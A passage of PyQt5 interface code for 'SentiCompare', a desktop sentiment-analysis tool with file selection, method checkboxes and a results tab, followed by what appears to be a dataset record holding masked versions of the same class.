self.results_tab = QtWidgets.QWidget()
self.results_tab.setObjectName("results_tab")
# Create results scroll box
self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)
self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))
self.results_scroll_box.setWidgetResizable(True)
self.results_scroll_box.setObjectName("results_scroll_box")
# Create results content
self.results_content = QtWidgets.QWidget()
self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))
self.results_content.setObjectName("results_content")
self.results_scroll_box.setWidget(self.results_content)
# Create results content text
self.results_content_text = QtWidgets.QTextEdit(self.results_content)
self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))
self.results_content_text.setReadOnly(True)
self.results_content_text.setObjectName("results_content_text")
# Add results tab to input/output tab window
self.input_output_box.addTab(self.results_tab, "")
# Disable results tab
self.input_output_box.setTabEnabled(2, False)
# Create first group box
font.setPointSize(14)
self.group_box_1 = QtWidgets.QGroupBox(self.main_window)
self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))
self.group_box_1.setFont(font)
self.group_box_1.setTitle("")
self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)
self.group_box_1.setFlat(False)
self.group_box_1.setCheckable(False)
self.group_box_1.setObjectName("group_box_1")
# Create first vertical layout
self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)
self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))
self.vertical_layout_widget_1.setObjectName("vertical_layout_widget_1")
self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.vertical_layout_widget_1)
self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)
self.vertical_layout_1.setObjectName("vertical_layout_1")
# Create pronoun checkbox
self.pronoun_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.pronoun_checkbox.setFont(font)
self.pronoun_checkbox.setObjectName("pronoun_checkbox")
# Add pronoun checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.pronoun_checkbox)
# Create lexical checkbox
self.lexical_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.lexical_checkbox.setFont(font)
self.lexical_checkbox.setObjectName("lexical_checkbox")
# Add lexical checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.lexical_checkbox)
# Create rule based checkbox
self.rule_based_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.rule_based_checkbox.setFont(font)
self.rule_based_checkbox.setObjectName("rule_based_checkbox")
# Add rule_based checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.rule_based_checkbox)
# Create machine learning checkbox
self.machine_learning_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.machine_learning_checkbox.setFont(font)
self.machine_learning_checkbox.setObjectName("machine_learning_checkbox")
# Add machine learning checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.machine_learning_checkbox)
# Create help scroll box
self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)
self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))
self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)
self.help_scroll_box.setWidgetResizable(True)
self.help_scroll_box.setObjectName("help_scroll_box")
# Create help content
self.help_content = QtWidgets.QWidget()
self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))
self.help_content.setObjectName("help_content")
self.help_scroll_box.setWidget(self.help_content)
# Create selected files variable
self.selected_files = {}
# Set current tab
self.input_output_box.setCurrentIndex(0)
# Retranslate UI
self.retranslateUI()
# Connect UI slots
QtCore.QMetaObject.connectSlotsByName(self.main_window)
# ============================================== #
# Define retranslateUI function
def retranslateUI(self):
# Add text to ui elements
_translate = QtCore.QCoreApplication.translate
self.main_window.setWindowTitle(_translate("main_window", "SentiCompare"))
self.add_button.setText(_translate("main_window", "Add"))
self.delete_button.setText(_translate("main_window", "Delete"))
self.input_output_box.setTabText(self.input_output_box.indexOf(self.select_files_tab),
_translate("main_window", "Select Files"))
self.input_output_box.setTabText(self.input_output_box.indexOf(self.manual_input_tab),
_translate("main_window", "Manual Input"))
self.input_output_box.setTabText(self.input_output_box.indexOf(self.results_tab),
_translate("main_window", "Results"))
self.run_button.setText(_translate("main_window", "Run"))
self.quit_button.setText(_translate("main_window", "Quit"))
self.pronoun_checkbox.setText(_translate("main_window", "Pronoun Usage"))
self.lexical_checkbox.setText(_translate("main_window", "Lexical"))
self.rule_based_checkbox.setText(_translate("main_window", "Rule Based"))
self.machine_learning_checkbox.setText(_translate("main_window", "Machine Learning"))
self.branding_label.setText(_translate("main_window", "SentiCompare"))
# ============================================== #
# Define showWindow function
def showWindow(self):
self.main_window.show()
# ============================================== #
# Define selectFiles function
def selectFiles(self):
# Create file dialog
file_dialog = FileDialog(self.main_window)
file_dialog.setFilters(["Text files (*.txt)"])
file_dialog.setDefaultFilterIndex = 0
file_dialog.setDefaultDirectory(os.path.expanduser('~'))
file_dialog.exec()
# Return if nothing was selected
if file_dialog.getPath() == '':
return
# Add files from selected directory to file list
elif file_dialog.getFilename()[2] == '':
for file in os.listdir(file_dialog.getPath()):
if file.endswith('.txt') and not file.startswith('.'):
file_path = os.path.join(file_dialog.getPath(), file)
                    if file not in self.selected_files:
self.selected_files[file] = file_path
item = QStandardItem(file)
item.setCheckable(True)
self.file_view_model.appendRow(item)
# Add selected file to list
else:
            if file_dialog.getFilename()[1] not in self.selected_files:
self.selected_files[file_dialog.getFilename()[1]] = file_dialog.getPath()
item = QStandardItem(file_dialog.getFilename()[1])
item.setCheckable(True)
self.file_view_model.appendRow(item)
# ============================================== #
# Define removeFiles function
def removeFiles(self):
# Remove all checked files
for i in range(self.file_view_model.rowCount() - 1, -1, -1):
if self.file_view_model.item(i).checkState():
filename = self.file_view_model.item(i).text()
del self.selected_files[filename]
self.file_view_model.removeRow(i)
# ============================================== #
# Define run function
def run(self):
# Check if an analysis method is selected
if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.isChecked() or
self.rule_based_checkbox.isChecked() or self.machine_learning_checkbox.isChecked()):
# Create and show an error message
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle("Missing Parameters")
message_box.setText("You haven't selected any methods of sentiment analysis. Please select at least one " +
"method from the list of options.")
message_box.exec_()
return
# Check if the current tab is valid
if self.input_output_box.currentIndex() == 2:
# Create and show error message
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle("Select Input")
message_box.setText("You must be on the \"Select Files\" page or the \"Manual Input\" page to run " +
"an analysis. Please select one of those pages and try again.")
message_box.exec_()
return
else:
progress_bar = QtWidgets.QProgressDialog("Running Sentiment Analysis...", "Cancel", 0, 100, self.main_window)
progress_bar.setValue(0)
progress_bar.setCancelButton(None)
progress_bar.setWindowModality(QtCore.Qt.WindowModal)
progress_bar.resize(400, 50)
progress_bar.show()
# Analyze selected files
if self.input_output_box.currentIndex() == 0:
sentiment_analyzer = SentimentAnalyzer(self.selected_files, progress_bar, pronoun=self.pronoun_checkbox.isChecked(),
lexical=self.lexical_checkbox.isChecked(),
rule_based=self.rule_based_checkbox.isChecked(),
machine_learning=self.machine_learning_checkbox.isChecked())
# Analyze manual input
else:
sentiment_analyzer = SentimentAnalyzer(self.text_input.toPlainText(), progress_bar, pronoun=self.pronoun_checkbox.isChecked(),
lexical=self.lexical_checkbox.isChecked(),
rule_based=self.rule_based_checkbox.isChecked(),
machine_learning=self.machine_learning_checkbox.isChecked())
results = sentiment_analyzer.runAnalyses()
progress_bar.close()
if results:
self.results_content_text.setText(results)
self.input_output_box.setTabEnabled(2, True)
self.input_output_box.setCurrentIndex(2)
else:
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle("Missing Input")
message_box.setText("You haven't added any input to analyze. Please select one or more files or " +
"input some data manually.")
message_box.exec_()
return
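# Hypothetical standalone launch sketch (shown as comments; assumes the real
# entry point elsewhere in the project creates the QApplication):
#
#     app = QtWidgets.QApplication([])
#     ui = UIMainWindow()
#     ui.showWindow()
#     app.exec_()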
# ================================================== #
# EOF #
# ================================================== #
|
normal
|
{
"blob_id": "a555226b14223dca688d10b811eb36fb229360ce",
"index": 2457,
"step-1": "<mask token>\n\n\nclass UIMainWindow(object):\n <mask token>\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass UIMainWindow(object):\n\n def __init__(self):\n font = QtGui.QFont()\n font.setFamily('Myriad Pro')\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName('main_window')\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,\n QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().\n hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText('')\n self.branding_icon.setPixmap(QtGui.QPixmap(\n '../images/senticompare_logo.png'))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.\n AlignVCenter)\n self.branding_icon.setObjectName('branding_icon')\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily('Optima')\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName('branding_label')\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, \n 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\n 'horizontal_layout_widget_1')\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName('horizontal_layout_1')\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1\n )\n self.run_button.setObjectName('run_button')\n self.run_button.clicked.connect(self.run)\n self.horizontal_layout_1.addWidget(self.run_button)\n self.quit_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_1)\n self.quit_button.setObjectName('quit_button')\n self.quit_button.clicked.connect(self.main_window.close)\n self.horizontal_layout_1.addWidget(self.quit_button)\n self.select_files_tab = QtWidgets.QWidget()\n 
self.select_files_tab.setObjectName('select_files_tab')\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.\n select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, \n 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\n 'horizontal_layout_widget_2')\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName('horizontal_layout_2')\n font.setFamily('Myriad Pro')\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.\n PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName('input_output_box')\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName('file_view')\n self.file_view_model = QStandardItemModel(self.file_view)\n self.file_view.setModel(self.file_view_model)\n self.file_view.show()\n self.input_output_box.addTab(self.select_files_tab, '')\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2\n )\n self.add_button.setFont(font)\n self.add_button.setObjectName('add_button')\n self.add_button.clicked.connect(self.selectFiles)\n self.horizontal_layout_2.addWidget(self.add_button)\n self.delete_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName('delete_button')\n self.delete_button.clicked.connect(self.removeFiles)\n self.horizontal_layout_2.addWidget(self.delete_button)\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName('manual_input_tab')\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName('text_input')\n self.input_output_box.addTab(self.manual_input_tab, '')\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName('results_tab')\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName('results_scroll_box')\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName('results_content')\n self.results_scroll_box.setWidget(self.results_content)\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName('results_content_text')\n self.input_output_box.addTab(self.results_tab, '')\n self.input_output_box.setTabEnabled(2, False)\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle('')\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n 
self.group_box_1.setObjectName('group_box_1')\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName('vertical_layout_widget_1')\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.\n vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName('vertical_layout_1')\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName('pronoun_checkbox')\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n self.lexical_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName('lexical_checkbox')\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName('rule_based_checkbox')\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\n 'machine_learning_checkbox')\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName('help_scroll_box')\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName('help_content')\n self.help_scroll_box.setWidget(self.help_content)\n self.selected_files = {}\n self.input_output_box.setCurrentIndex(0)\n self.retranslateUI()\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n 
file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n <mask token>\n\n def run(self):\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.\n isChecked() or self.rule_based_checkbox.isChecked() or self.\n machine_learning_checkbox.isChecked()):\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Parameters')\n message_box.setText(\n \"You haven't selected any methods of sentiment analysis. Please select at least one \"\n + 'method from the list of options.')\n message_box.exec_()\n return\n if self.input_output_box.currentIndex() == 2:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Select Input')\n message_box.setText(\n 'You must be on the \"Select Files\" page or the \"Manual Input\" page to run '\n +\n 'an analysis. Please select one of those pages and try again.')\n message_box.exec_()\n return\n else:\n progress_bar = QtWidgets.QProgressDialog(\n 'Running Sentiment Analysis...', 'Cancel', 0, 100, self.\n main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files,\n progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(), rule_based=\n self.rule_based_checkbox.isChecked(), machine_learning=\n self.machine_learning_checkbox.isChecked())\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.\n toPlainText(), progress_bar, pronoun=self.\n pronoun_checkbox.isChecked(), lexical=self.\n lexical_checkbox.isChecked(), rule_based=self.\n rule_based_checkbox.isChecked(), machine_learning=self.\n machine_learning_checkbox.isChecked())\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Input')\n message_box.setText(\n \"You haven't added any input to analyze. Please select one or more files or \"\n + 'input some data manually.')\n message_box.exec_()\n return\n",
"step-3": "<mask token>\n\n\nclass UIMainWindow(object):\n\n def __init__(self):\n font = QtGui.QFont()\n font.setFamily('Myriad Pro')\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName('main_window')\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,\n QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().\n hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText('')\n self.branding_icon.setPixmap(QtGui.QPixmap(\n '../images/senticompare_logo.png'))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.\n AlignVCenter)\n self.branding_icon.setObjectName('branding_icon')\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily('Optima')\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName('branding_label')\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, \n 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\n 'horizontal_layout_widget_1')\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName('horizontal_layout_1')\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1\n )\n self.run_button.setObjectName('run_button')\n self.run_button.clicked.connect(self.run)\n self.horizontal_layout_1.addWidget(self.run_button)\n self.quit_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_1)\n self.quit_button.setObjectName('quit_button')\n self.quit_button.clicked.connect(self.main_window.close)\n self.horizontal_layout_1.addWidget(self.quit_button)\n self.select_files_tab = QtWidgets.QWidget()\n 
self.select_files_tab.setObjectName('select_files_tab')\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.\n select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, \n 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\n 'horizontal_layout_widget_2')\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName('horizontal_layout_2')\n font.setFamily('Myriad Pro')\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.\n PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName('input_output_box')\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName('file_view')\n self.file_view_model = QStandardItemModel(self.file_view)\n self.file_view.setModel(self.file_view_model)\n self.file_view.show()\n self.input_output_box.addTab(self.select_files_tab, '')\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2\n )\n self.add_button.setFont(font)\n self.add_button.setObjectName('add_button')\n self.add_button.clicked.connect(self.selectFiles)\n self.horizontal_layout_2.addWidget(self.add_button)\n self.delete_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName('delete_button')\n self.delete_button.clicked.connect(self.removeFiles)\n self.horizontal_layout_2.addWidget(self.delete_button)\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName('manual_input_tab')\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName('text_input')\n self.input_output_box.addTab(self.manual_input_tab, '')\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName('results_tab')\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName('results_scroll_box')\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n 